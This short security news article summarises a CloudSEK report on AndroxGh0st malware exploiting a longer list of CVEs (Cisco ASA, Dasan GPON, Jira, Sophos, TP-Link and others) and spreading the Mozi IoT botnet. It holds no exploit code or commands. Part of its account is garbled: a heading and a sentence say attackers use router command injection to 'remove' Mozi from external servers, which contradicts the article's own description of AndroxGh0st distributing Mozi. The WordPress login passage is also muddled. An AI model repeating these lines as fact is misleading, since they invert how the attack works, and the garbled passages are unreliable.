A Growing Cyber Threat

The creators of AndroxGh0st malware have started using a wider range of security weaknesses in internet-exposed apps to spread the Mozi botnet.

According to a report from CloudSEK, this botnet relies on remote code execution and credential-stealing techniques to keep a persistent foothold, attacking vulnerable systems to compromise critical infrastructures.

What Is AndroxGh0st?

AndroxGh0st is a malware tool built with Python, designed to target Laravel-based applications. Its goal is to capture sensitive data stored on popular cloud platforms like AWS, SendGrid, and Twilio.

Since 2022, it has taken advantage of known flaws in Apache web servers (CVE-2021-41773), Laravel (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to access systems, gain control, and elevate its privileges on infected networks.

Vulnerabilities Used by AndroxGh0st

CloudSEK’s recent analysis points to a wider focus for AndroxGh0st. The malware authors are now exploiting several security gaps to infiltrate systems, including:

• Cisco ASA WebVPN XSS flaw – CVE-2014-2120 (CVSS: 4.3)
• Dasan GPON vulnerabilities – Authentication bypass and command injection (CVSS: 9.8)
• Atlassian Jira path traversal issue – CVE-2021-26086 (CVSS: 5.3)
• Metabase local file inclusion flaw – CVE-2021-41277 (CVSS: 7.5)
• Sophos Firewall bypass vulnerability – CVE-2022-1040 (CVSS: 9.8)
• Oracle EBS file upload flaw – CVE-2022-21587 (CVSS: 9.8)
• TP-Link Archer AX21 command injection – CVE-2023-1389 (CVSS: 8.8)
• PHP CGI argument injection (CVSS: 9.8)
• GeoServer remote code execution flaw (CVSS: 9.8)

The botnet cycles through commonly used usernames and uses a specific password pattern to get access to systems. It then directs the target to the WordPress admin dashboard (via /wp-admin/). With successful login, it gains access to critical website settings and control.

How AndroxGh0st Uses Routers to Remove Mozi Botnet

Attackers use unauthorized command executions on home routers, such as Netgear DGN and Dasan GPON models, to remove “Mozi.m” from external servers (“200.124.241[.]140” and “117.215.206[.]216”).

Mozi Botnet’s Role in the Attack

Mozi, another widespread botnet, is known for infecting IoT devices and linking them into a network used for DDoS attacks. Though Chinese authorities arrested Mozi’s creators in 2021, Mozi’s activity only slowed down in August 2023 when an unknown entity issued a command to halt it. This pause likely came from an update that acted as a kill switch.

A Collaboration Between AndroxGh0st and Mozi

AndroxGh0st now uses Mozi’s powerful tools to increase its reach, embedding Mozi’s features into its setup. This collaboration enables AndroxGh0st to spread more effectively, leveraging Mozi’s ability to infect IoT devices and using Mozi’s payloads to achieve broader infection without additional routines.

CloudSEK also notes that if both botnets rely on the same infrastructure, it’s likely they are managed by the same cybercriminal group, allowing for greater coordination and control over infected devices. This joint operation allows for a more efficient and powerful botnet network that can spread widely across vulnerable IoT and web systems.